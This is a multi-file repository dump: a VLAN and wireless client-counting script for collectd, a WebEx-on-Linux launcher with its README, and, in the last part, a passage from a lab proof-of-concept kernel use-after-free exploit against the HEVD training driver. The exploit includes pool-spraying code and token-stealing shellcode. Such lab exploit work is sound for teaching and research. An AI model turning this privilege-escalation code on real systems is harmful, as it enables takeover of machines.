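    return [len(ipv4 - dual), len(dual), len(ipv6 - dual)]


def _select(counts, clients):
    """Pick the value a ``clients=`` keyword asks for from a ``_client_counts`` triple.

    Returns None for an unknown keyword, like the original if/elif chains
    that fell off their end.
    """
    if clients == "all":
        return sum(counts)
    if clients == "ipv4only":
        return counts[IPV4_ONLY]
    if clients == "ipv6only":
        return counts[IPV6_ONLY]
    if clients == "dualstack":
        return counts[DUALSTACK]
    if clients == "collectd":
        return counts
    return None


def vlan10(clients="all"):
    """Client counts for VLAN 10 (keyword semantics: see ``_select``)."""
    return _select(_client_counts("arp_v10", ["nbc_v10"]), clients)


def vlan10_30(clients="all"):
    """Both public VLANs together: IPv4 from VLAN 10, IPv6 from VLAN 10 and 30 (VLAN 30 is IPv6-only)."""
    return _select(_client_counts("arp_v10", ["nbc_v10", "nbc_v30"]), clients)


def vlan20(clients="all"):
    """Client counts for VLAN 20 (keyword semantics: see ``_select``)."""
    return _select(_client_counts("arp_v20", ["nbc_v20"]), clients)


def vlan30(clients="all"):
    """Client counts for VLAN 30, the IPv6-only network.

    Its ARP walk is expected to be empty, so — as in the original — the
    default ``"all"`` reports the IPv6-only count. Other keywords are
    honoured the same way as for the other VLANs (the original ignored them).
    """
    counts = _client_counts("arp_v30", ["nbc_v30"])
    if clients == "all":
        return counts[IPV6_ONLY]
    return _select(counts, clients)


def vlan40(clients="all"):
    """Client counts for VLAN 40 (keyword semantics: see ``_select``).

    Fixed: the original ``"all"`` branch summed VLAN 10's variables, which do
    not exist in this scope, so ``vlan40()`` raised NameError.
    """
    return _select(_client_counts("arp_v40", ["nbc_v40"]), clients)


def bands(output="all"):
    """Wireless clients per 802.11 protocol, from cisco_wlc_bands.sh.

    Args:
        output: ``"all"`` (sum), one of ``"dot11a"``, ``"dot11b"``,
            ``"dot11g"``, ``"dot11n24"``, ``"dot11n5"``, or ``"collectd"``
            for the list ``[a, b, g, n24, n5]``. (``"dot11b"`` was not
            selectable before; its value was only reachable via "collectd".)

    Returns:
        int, list of int, or None for an unknown keyword.

    Raises:
        ValueError if the helper's output is not five colon-separated integers.
    """
    raw = _run(WLC_SCRIPT)
    if not isinstance(raw, str):      # Python 3: Popen hands back bytes
        raw = raw.decode("ascii", "replace")
    try:
        counts = [int(field) for field in raw.strip().split(":")]
    except ValueError:
        raise ValueError("unexpected output from %s: %r" % (WLC_SCRIPT, raw))
    if len(counts) != len(_BAND_KEYS):
        raise ValueError("unexpected output from %s: %r" % (WLC_SCRIPT, raw))
    if output == "all":
        return sum(counts)
    if output == "collectd":
        return counts
    if output in _BAND_KEYS:
        return counts[_BAND_KEYS.index(output)]
    return None


def _collectd_lines():
    """Yield the collectd ``PUTVAL`` lines for all VLANs and the WLC bands."""
    public = vlan10_30(clients="collectd")
    yield 'PUTVAL gw.troopers.net/clients/ipv4only N:{0}'.format(public[IPV4_ONLY])
    yield 'PUTVAL gw.troopers.net/clients/dualstack N:{0}'.format(public[DUALSTACK])
    yield 'PUTVAL gw.troopers.net/clients/ipv6only N:{0}'.format(public[IPV6_ONLY])
    v20 = vlan20(clients="collectd")
    yield 'PUTVAL gw.troopers.net/clients_vlan20/ipv4only N:{0}'.format(v20[IPV4_ONLY])
    yield 'PUTVAL gw.troopers.net/clients_vlan20/dualstack N:{0}'.format(v20[DUALSTACK])
    yield 'PUTVAL gw.troopers.net/clients_vlan20/ipv6only N:{0}'.format(v20[IPV6_ONLY])
    yield 'PUTVAL gw.troopers.net/clients_vlan30/ipv6only N:{0}'.format(vlan30())
    v40 = vlan40(clients="collectd")
    yield 'PUTVAL gw.troopers.net/clients_vlan40/ipv4only N:{0}'.format(v40[IPV4_ONLY])
    yield 'PUTVAL gw.troopers.net/clients_vlan40/dualstack N:{0}'.format(v40[DUALSTACK])
    yield 'PUTVAL gw.troopers.net/clients_vlan40/ipv6only N:{0}'.format(v40[IPV6_ONLY])
    for key, value in zip(_BAND_KEYS, bands(output="collectd")):
        yield 'PUTVAL wlc.troopers.net/wlc_bands/{0} N:{1}'.format(key, value)


def main():
    """Parse the single positional keyword and print the requested counter(s)."""
    parser = argparse.ArgumentParser()
    parser.add_argument("vlan", help="client vlan or bands")
    args = parser.parse_args()

    if args.vlan == "ipv4only":
        print(vlan10(clients="ipv4only"))
    elif args.vlan == "dualstack":
        print(vlan10(clients="dualstack"))
    elif args.vlan == "ipv6only":
        print(vlan10(clients="ipv6only") + vlan30())
    elif args.vlan == "vlan40":
        print(vlan40(clients="all"))
    elif args.vlan == "vlan30":
        print(vlan30())
    elif args.vlan == "vlan20":
        print(vlan20(clients="all"))
    elif args.vlan == "collectd":
        for line in _collectd_lines():
            print(line)
    elif args.vlan == "bands":
        print(bands(output="all"))
    elif args.vlan == "bands2":
        # Fixed: the original printed four labels against the wrong columns
        # (the 802.11b column was labelled dot11g, and so on down the list).
        counts = bands(output="collectd")
        for key, value in zip(_BAND_KEYS, counts):
            print('{0}:{1}'.format(key, value))
        print('------------')
        print('all: {0}'.format(sum(counts)))


if __name__ == "__main__":
    main()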
-------------------------------------------------------------------------------- /netmon_troopers/types_local.db: -------------------------------------------------------------------------------- 1 | ipv4only value:GAUGE:0:65535 2 | ipv6only value:GAUGE:0:65535 3 | dualstack value:GAUGE:0:65535 4 | wlan_clients clients:GAUGE:0:65535 5 | clients value:GAUGE:0:65535 6 | aps value:GAUGE:0:65535 7 | dot11a value:GAUGE:0:65535 8 | dot11b value:GAUGE:0:65535 9 | dot11g value:GAUGE:0:65535 10 | dot11n24 value:GAUGE:0:65535 11 | dot11n5 value:GAUGE:0:65535 -------------------------------------------------------------------------------- /webex-linux/README.MD: -------------------------------------------------------------------------------- 1 | # Installation 2 | 3 | 1. [Download Firefox x86](https://www.mozilla.org/en-US/firefox/new/) as an __archive__ and unzip it, e.g. in your home folder 4 | 1. [Download JRE x86](http://www.oracle.com/technetwork/java/javase/downloads/index.html) as an __archive__ and unzip it, e.g. in your home folder 5 | 1. [Download webex.sh](https://raw.githubusercontent.com/ernw/insinuator-snippets/master/webex-linux/webex.sh) or clone this repository 6 | 1. Modify the paths in webex.sh to point to the folders of Firefox x86 and JRE x86. 7 | 1. Source webex.sh 8 | * E.g. put `source /path/to/webex.sh` in your .bashrc. This will load it automatically. 9 | 10 | __Please note:__ There is no need to uninstall Firefox or the JRE if you already have any version of them installed. However, these unpacked copies of Firefox and the JRE are not updated by your package manager: you must track their security releases yourself and update promptly — an out-of-date browser with the Java plugin enabled is a significant exposure — and remove both once you no longer need WebEx. 11 | 12 | Also find the accompanying [blog post on insinuator.net](https://www.insinuator.net/2015/07/solving-sound-issues-when-using-webex-with-linux-and-firefox/). 13 | 14 | # Usage 15 | To start your WebEx session first close Firefox (the script tries to detect if Firefox is running and will ask you to close it). Then just open a terminal and run `webex` (Be sure to source webex.sh first!
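See installation above)

# What this script will do
At the time the post was created, WebEx was able to run 'smoothly' on Linux with 32bit versions of both Firefox and JRE. Essentially this script will just do that: It will put a symlink to the x86 plugin into Firefox' plugin folder and launch x86 Firefox. After Firefox is closed again, it will remove the symlink and you can work with your favorite version of your favorite browser again. :wink:
-------------------------------------------------------------------------------- /webex-linux/webex.sh: --------------------------------------------------------------------------------
#!/bin/sh
# Source this file; it defines the `webex` shell function described in the README.
#
# webex: temporarily expose the x86 JRE's NPAPI plugin to an x86 Firefox,
# start Firefox on the WebEx sign-on page and undo the change when it exits.
#
# SECURITY NOTE: while the link exists, every page this Firefox loads can
# instantiate Java applets through a JRE that is updated by hand (see the
# README). Keep the session to WebEx, and rely on the cleanup below — it also
# runs when the session is interrupted, so the plugin does not stay enabled
# for your everyday browser by accident.
webex() {
    FIREFOX_PATH="/opt/programs/firefox_x86"   # Change this to the actual path. It is quoted below, so spaces need no escaping.
    JRE_PATH="/opt/programs/jre_x86"           # Change this to the actual path.
    WEBEX_URL="https://signin.webex.com/collabs/auth" # initial signon page
    PLUGIN_DIR="$HOME/.mozilla/plugins"
    PLUGIN="$PLUGIN_DIR/libnpjp2.so"

    if pgrep firefox > /dev/null; then
        echo "[-] Firefox seems to be running. Please exit first"
        return 1
    fi

    echo "[+] Placing link to x86 plugin into ~/.mozilla/plugins"
    [ -d "$PLUGIN_DIR" ] || mkdir -p "$PLUGIN_DIR"
    # -L also catches a dangling link left behind by an interrupted run; the
    # old -f test missed it and the ln below then failed with "File exists".
    if [ -e "$PLUGIN" ] || [ -L "$PLUGIN" ]; then
        echo "[+] Backing up already existing plugin"
        mv "$PLUGIN" "$PLUGIN.bak"
    fi
    ln -s "${JRE_PATH}/lib/i386/libnpjp2.so" "$PLUGIN_DIR/"

    # Subshell: the trap must not leak into the interactive shell this
    # function was s sourced into.
    (
        cleanup() {
            echo "[+] Removing link to x86 plugin"
            rm -f "$PLUGIN"
            if [ -f "$PLUGIN.bak" ]; then
                echo "[+] Restoring plugin from backup"
                mv "$PLUGIN.bak" "$PLUGIN"
            fi
        }
        trap 'cleanup; exit 130' INT TERM HUP

        echo "[+] Starting x86 firefox"
        "${FIREFOX_PATH}/firefox" -new-window "${WEBEX_URL}"

        cleanup
    )
}
-------------------------------------------------------------------------------- /windows_kernel_exploitation/HEVD_64Kernel_UAF.py: --------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
"""HEVD (HackSys Extreme Vulnerable Driver) 64-bit use-after-free exploit.

Lab-only proof of concept (ctypes, written for Python 2 on Windows): sprays
the non-paged pool with named-pipe buffers so the freed HEVD object is
reclaimed by attacker-controlled data, then runs a token-stealing payload.
"""

import sys
from ctypes import *
from ctypes.wintypes import *
import struct
import time
import os

kernel32 = windll.kernel32
ntdll = windll.ntdll

# ctypes assumes every foreign function returns a 32-bit C int. On a 64-bit
# interpreter that silently truncates HANDLEs and the pointer VirtualAlloc
# returns, and it turns INVALID_HANDLE_VALUE (-1) into a truthy int that the
# old `if not handle` test never caught. Declare what this script relies on.
kernel32.CreateFileA.restype = HANDLE
kernel32.VirtualAlloc.restype = c_void_p
kernel32.VirtualAlloc.argtypes = [c_void_p, c_size_t, DWORD, DWORD]
INVALID_HANDLE_VALUE = HANDLE(-1).value


ALLOC_SIZE = 0x70 # Adjust this value to get chunk allocations of desired length
# 0x48 is the per-buffer overhead the author measured for a pipe data entry on
# the target build; re-check it on any other Windows build before relying on it.
BUFSIZE = (ALLOC_SIZE - 0x48) # Calculating buffer size to allocate chunks of given length

# Pipe handles are kept for the whole run so the kernel buffers behind them
# stay allocated in the pool (closing the last handle would free them).
handle_read_array1 = []
handle_write_array1 = []
handle_read_array2 = []
handle_write_array2 = []


METHOD_NEITHER = 0x3
FILE_ANY_ACCESS = 0x0
FILE_DEVICE_UNKNOWN = 0x00000022

def ctl_code(function,
             devicetype = FILE_DEVICE_UNKNOWN,
             access = FILE_ANY_ACCESS,
             method = METHOD_NEITHER):
    """Recreate CTL_CODE macro to generate driver IOCTL"""
    return ((devicetype << 16) | (access << 14) | (function << 2) | method)

def get_device_handle(device):
    """Open *device* (the driver's symbolic link path) read/write and return its HANDLE.

    Exits the process when CreateFileA fails. Failure is signalled by
    INVALID_HANDLE_VALUE, not by a NULL handle, so that is what is checked.
    """
    open_existing = 0x3
    generic_read = 0x80000000
    generic_write = 0x40000000

    handle = kernel32.CreateFileA(device,
                                  generic_read | generic_write,
                                  None,
                                  None,
                                  open_existing,
                                  0x40000080,  # FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL
                                  None)

    if handle is None or handle == INVALID_HANDLE_VALUE:
        print("\t[-] Unable to get device handle")
        print("\t[-] GetLastError: %d" % kernel32.GetLastError())
        sys.exit(-1)

    return handle



def _create_pipes(count, read_handles, write_handles):
    """Create *count* anonymous pipes; append their handles to the two lists, which keep them alive."""
    for _ in range(count):
        read_pipe = HANDLE()
        write_pipe = HANDLE()

        # Create Pipe for content in Non-paged Pool
        if not kernel32.CreatePipe(byref(read_pipe), byref(write_pipe), None, BUFSIZE):
            print("[!] Failed to Create Pipe... exiting now")
            sys.exit(-1)

        read_handles.append(read_pipe)
        write_handles.append(write_pipe)


def _fill_pipes(write_handles, content):
    """Write *content* (BUFSIZE bytes) into every pipe so its pool chunk is actually allocated."""
    transferred = DWORD()
    for handle in write_handles:
        if not kernel32.WriteFile(handle, content, BUFSIZE, byref(transferred), None):
            print("[!] Failed to write to pipe... exiting now")
            sys.exit(-2)


def spray():
    """Massage the non-paged pool: fill existing holes, then punch a fresh pattern of holes.

    Phase 1 allocates 50 000 pipe buffers to absorb whatever free chunks of
    ALLOC_SIZE the pool currently holds. Phase 2 allocates 5 000 more, which
    should now be adjacent, and drains (frees) every second one, leaving
    alternating free chunks of exactly the size the freed HEVD object has.
    """
    print("[+] Starting to Spray Pool Memory (Filling Holes)")
    # Allocating all needed pipes
    _create_pipes(50000, handle_read_array1, handle_write_array1)

    print("Writing buffer now!")
    # One buffer is enough: WriteFile copies it, so it can be reused for every pipe.
    pattern = create_string_buffer("\x41" * BUFSIZE, BUFSIZE)
    _fill_pipes(handle_write_array1, pattern)

    print("\t[*] Finished Filling Holes with {0} Objects".format(len(handle_write_array1)))

    print("[+] Spraying 5k more for holes")
    _create_pipes(5000, handle_read_array2, handle_write_array2)
    _fill_pipes(handle_write_array2, pattern)

    print("[+] Grooming the spray!")
    transferred = DWORD()
    for handle in handle_read_array2[::2]:
        buff = create_string_buffer(BUFSIZE + 1)
        if not kernel32.ReadFile(handle, buff, BUFSIZE, byref(transferred), None):
            # was mislabelled as a write failure
            print("[!] Failed to read from pipe... exiting now")
            sys.exit(-2)

    print("\t[*] Done Grooming!")
    return



def virtual_alloc_payload():
    """Copy the token-stealing payload into a fresh RWX region and return its address.

    The kernel is later made to jump to this user-mode address, so the page
    must be executable (PAGE_EXECUTE_READWRITE); that presupposes SMEP is
    off or bypassed, as HEVD lab setups assume.
    """
    payload_length, payload_address = heap_alloc_payload()
    MEM_COMMIT_RESERVE = 0x3000
    PAGE_EXECUTE_READWRITE = 0x40
    region_size = 1024
    if payload_length > region_size:
        print("[-] Payload (%d bytes) does not fit the %d-byte region" % (payload_length, region_size))
        sys.exit(-1)

    va_address = kernel32.VirtualAlloc(None, region_size, MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE)
    if not va_address:
        print("[-] VirtualAlloc failed, GetLastError: %d" % kernel32.GetLastError())
        sys.exit(-1)

    print("[+] VirtualAlloc address: 0x%X" % va_address)
    print("[+] Copying payload to VirtualAlloc region")
    memmove(va_address, payload_address, payload_length)
    return va_address


def heap_alloc_payload():

    """
    token_stealing_shellcode = (
    start:
        mov rdx, [gs:188h] ;KTHREAD pointer
        mov r8, [rdx+70h] ;EPROCESS pointer
        mov r9, [r8+188h] ;ActiveProcessLinks list head
        mov rcx, [r9] ;follow link to first process in list
    find_system:
        mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId
        cmp rdx, 4 ;UniqueProcessId == 4?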
138 | jz found_system ;YES - move on 139 | mov rcx, [rcx] ;NO - load next entry in list 140 | jmp find_system ;loop 141 | found_system: 142 | mov rax, [rcx+80h] ;offset to token 143 | and al, 0f0h ;clear low 4 bits of _EX_FAST_REF structure 144 | find_cmd: 145 | mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId 146 | cmp rdx, 1234h ;UniqueProcessId == ZZZZ? (PLACEHOLDER) 147 | jz found_cmd ;YES - move on 148 | mov rcx, [rcx] ;NO - next entry in list 149 | jmp find_cmd ;loop 150 | found_cmd: 151 | mov [rcx+80h], rax ;copy SYSTEM token over top of this process's token 152 | return: 153 | ret 154 | ) 155 | """ 156 | 157 | token_stealing_shellcode = ( 158 | "\x65\x48\x8B\x14\x25\x88\x01\x00\x00\x4C\x8B\x42\x70\x4D\x8B\x88" 159 | "\x88\x01\x00\x00\x49\x8B\x09\x48\x8B\x51\xF8\x48\x83\xFA\x04\x74" 160 | "\x05\x48\x8B\x09\xEB\xF1\x48\x8B\x81\x80\x00\x00\x00\x24\xF0\x48" 161 | "\x8B\x51\xF8\x48\x81\xFA" + struct.pack("